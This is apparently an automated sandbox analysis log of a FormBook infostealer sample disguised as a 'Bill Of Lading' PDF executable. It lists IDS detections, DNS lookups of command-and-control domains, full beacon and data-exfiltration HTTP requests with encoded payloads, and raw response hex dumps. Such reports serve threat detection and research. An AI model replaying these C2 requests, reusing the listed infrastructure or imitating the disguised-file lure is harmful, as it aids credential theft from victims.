            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 104.21.78.104:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49953 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 63.250.47.57:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 154.23.184.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 91.212.26.5:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 68.66.226.116:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 104.21.78.104:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 68.66.226.116:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49967 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50022 -> 91.212.26.5:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 154.23.184.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 107.148.177.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49938 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 154.23.184.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 68.66.226.116:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49983 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 63.250.47.57:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50018 -> 107.148.177.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50034 -> 63.250.47.57:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50054 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 3.33.130.190:80
            Source: DNS query: www.academyinmotion.xyz
            Source: DNS query: www.030002252.xyz
            Source: DNS query: www.60881.xyz
            Source: DNS query: www.ly0.xyz
            Source: Joe Sandbox ViewIP Address: 13.248.169.48
            Source: Joe Sandbox ViewIP Address: 65.21.196.90
            Source: Joe Sandbox ViewASN Name: AMAZON-02US
            Source: Joe Sandbox ViewASN Name: AMAZON-02US
            Source: Joe Sandbox ViewASN Name: CP-ASDE
            Source: Joe Sandbox ViewASN Name: WEBINDUSTRIEFR
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 14 times)
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
            Source: global trafficHTTP traffic detected: GET /63ck/?Znyl=2rnxDB&Qzj=GQYraOg50FzHvWxTy9J2g/Ct8yJZYLUl1pszYO6BquwY8zCRfPuOPPLv6opwWQ+1qa0YVJN1ZlZd4AL6pjVc8tqy3KaAjtZyQfx4UTLqHu607EYV+xyRwE8= HTTP/1.1Host: www.academyinmotion.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /o7wc/?Qzj=noDrsAMitbMGukbGKwTOr3sYcBr23H5ivpvnAiMvw1nUlPzFIxH7oxZbrZBuy0eo4pgag2ycYt5GuEsaJdfqIMS3tV1Dx9iQIhSiX0wNT38Z12lUBSmDrQk=&Znyl=2rnxDB HTTP/1.1Host: www.heeraka.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /53bw/?Znyl=2rnxDB&Qzj=y602DfOxy8k4aDGeL32BfjMr8rtJj4VEvf5zKPNxBw/5ZQtnSgrsDIShG/LT94BV3SRTeLh29bGmgRGfpvfkbNV5yHp9DO9ljl/7OAHX9kTVnWn3IiM7pPI= HTTP/1.1Host: www.awesomearv.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /2ncs/?Qzj=C9x4nV75ALRtqPK+aAR0NWmp5g6EqVqabxnIo4b2Z27N+E0QPuJF7pA8iv4PlagxECtfepEWwKhTDmrEQ68cs056FDzHHej7JHydzS2yCPPgbwEKPk9K7sk=&Znyl=2rnxDB HTTP/1.1Host: www.030002252.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ynjl/?Qzj=PEs7u0VzI3DSA9TKYNWnz6gyWb/C39oE0a50vjpoFb3NQEkD5EPR31gJ3YEDEVY88OmbAto+098c/gTiopGLABAEMyjtpbfsUvV6UeXcuCjdlGHHhk6aRcY=&Znyl=2rnxDB HTTP/1.1Host: www.60881.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /r61b/?Qzj=3quBh4mzL0lL+B9uaAFlB72ZycJbxnt6GENoLoKygJVSWFdT0X7NdoQT/6uiE3Ni1BD7Zx2rh99upTwYdPvuDtoYAZVOuycnaW3rI/gIwuhnX/+XN/+iqEA=&Znyl=2rnxDB HTTP/1.1Host: www.mjcregionsud.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /kbee/?Qzj=DCgTIaYcg8rLkvez6aURNH1rI8GLniCnkbIF1Zor3lwvkrlOJ/rxEwh4juCbWbA1v3jo2CjSkAc6+9U16ObyIJEVbwGNWxBZ4iE6d4sVGLDCvtPxuAtI0Gg=&Znyl=2rnxDB HTTP/1.1Host: www.levelsabovetravel.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /9m01/?Qzj=YTEnPXeuvLCqp8pRYoqPCdBwzXmtEoIu3aiFszfHZiHCethv0UoX0rXDgO0m0L5Zay3qgh7+EeCD2cfEa0kxYtbLgo4/0RqeWSM2Ph2v0Riv4xOBN3dU33Q=&Znyl=2rnxDB HTTP/1.1Host: www.d81dp.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /q7ah/?Qzj=yQb1MnoYePGa+D7HYWwXgG+nDQu6P4qgSNNB5eb+vdtsin1jnkdmikqCDVoWxFHrVuMckJ02SL88S12T7EptmvXNk3VDSDUHyMzwNFIiRJYEDhiEAb6niHg=&Znyl=2rnxDB HTTP/1.1Host: www.numbox.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /vshw/?Qzj=EspU2mytRZKz4auAzVKL1tfZdJmh9evbelDltaue1VIW4sYIVCILyk3Sg5ScN2hRjv7eCPLeVYxJkFe87LUrFuvYQ7vdzmgwzIu85Xz/vDtptw9jh7A1S+4=&Znyl=2rnxDB HTTP/1.1Host: www.ly0.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /kgyd/?Znyl=2rnxDB&Qzj=Wu3HLPqvQhberYZQa2vA+jLd86RSCoLcCB7xsP8R/99k0A4wkukwLWUZ+Z7OJCWhofveZifw88127MBJWT7MfBvd7RqI/EwbWL2cnrCtj+ZcWXeu3tlvVIc= HTTP/1.1Host: www.myrideguy.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /qwed/?Qzj=3xPBQa2W6ZGmKQ9eZ4Wsc/iyYd0uukSyxcTE+lTJMU/LzzcDJGN7AbwmZfmE7bRgUl3cSaaIlgRs7XOqQeV161XTOJOG3ZFD8XPlmSsUpfcf+2m+08EeHO0=&Znyl=2rnxDB HTTP/1.1Host: www.lunch.deliveryAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /te6q/?Qzj=Bi48EnnHLnucFoFteZ9CbIdOGuitqrUowmdcea1K+IX7Dd8zgRCPoEq+V26bo8zYK23oBEB5tVQZMZR237sZHxvwddrlAP0HIvOhneqwjksiJ5dMJ78gJU0=&Znyl=2rnxDB HTTP/1.1Host: www.allinathletes.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /el3s/?Qzj=6Ta3dC1SbFexLGaAyK/XrrF8DJnhB8YLWm/0OzXEbXNGBqYW7sBnSGIWAqT2FNWebLiZ+YaCaloaRZMkiWHL3ouL7ZTQk1OjsJsHDhDi+W4oi2FDqh4Gk0M=&Znyl=2rnxDB HTTP/1.1Host: www.barbequecritics.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
            Source: global trafficDNS traffic detected: DNS query: www.academyinmotion.xyz
            Source: global trafficDNS traffic detected: DNS query: www.heeraka.info
            Source: global trafficDNS traffic detected: DNS query: www.awesomearv.buzz
            Source: global trafficDNS traffic detected: DNS query: www.030002252.xyz
            Source: global trafficDNS traffic detected: DNS query: www.60881.xyz
            Source: global trafficDNS traffic detected: DNS query: www.mjcregionsud.org
            Source: global trafficDNS traffic detected: DNS query: www.levelsabovetravel.info
            Source: global trafficDNS traffic detected: DNS query: www.d81dp.top
            Source: global trafficDNS traffic detected: DNS query: www.numbox.live
            Source: global trafficDNS traffic detected: DNS query: www.ly0.xyz
            Source: global trafficDNS traffic detected: DNS query: www.myrideguy.net
            Source: global trafficDNS traffic detected: DNS query: www.lunch.delivery
            Source: global trafficDNS traffic detected: DNS query: www.allinathletes.biz
            Source: global trafficDNS traffic detected: DNS query: www.barbequecritics.com
            Source: unknownHTTP traffic detected: POST /o7wc/ HTTP/1.1Host: www.heeraka.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateOrigin: http://www.heeraka.infoConnection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.heeraka.info/o7wc/User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4Data Raw: 51 7a 6a 3d 71 71 72 4c 76 30 35 53 38 74 70 52 73 6d 58 31 5a 6b 62 52 30 6a 45 79 5a 43 72 38 34 31 31 6f 71 70 36 32 57 43 51 73 2f 45 7a 74 69 71 2f 34 66 30 53 64 75 69 64 33 39 70 59 46 35 31 66 56 31 71 6b 56 6f 6e 71 75 57 49 35 72 6d 45 63 48 42 2f 4c 6f 63 49 7a 6a 68 32 31 4b 6c 74 75 78 54 45 37 50 44 6b 55 67 55 78 52 75 78 31 78 6b 4e 53 50 53 33 44 43 49 69 72 7a 52 4e 32 4d 33 73 73 54 47 6e 5a 6f 79 6c 4a 66 37 58 64 65 4f 79 35 2f 50 68 6a 43 35 31 66 2f 43 56 59 36 72 2f 65 6c 51 44 36 52 64 44 65 38 58 52 34 45 34 79 48 56 39 37 69 61 4f 50 78 4c 6c 79 51 6a 32 55 77 3d 3d Data Ascii: Qzj=qqrLv05S8tpRsmX1ZkbR0jEyZCr8411oqp62WCQs/Eztiq/4f0Sduid39pYF51fV1qkVonquWI5rmEcHB/LocIzjh21KltuxTE7PDkUgUxRux1xkNSPS3DCIirzRN2M3ssTGnZoylJf7XdeOy5/PhjC51f/CVY6r/elQD6RdDe8XR4E4yHV97iaOPxLlyQj2Uw==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 03:07:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 
a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 03:07:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 
a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 03:07:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 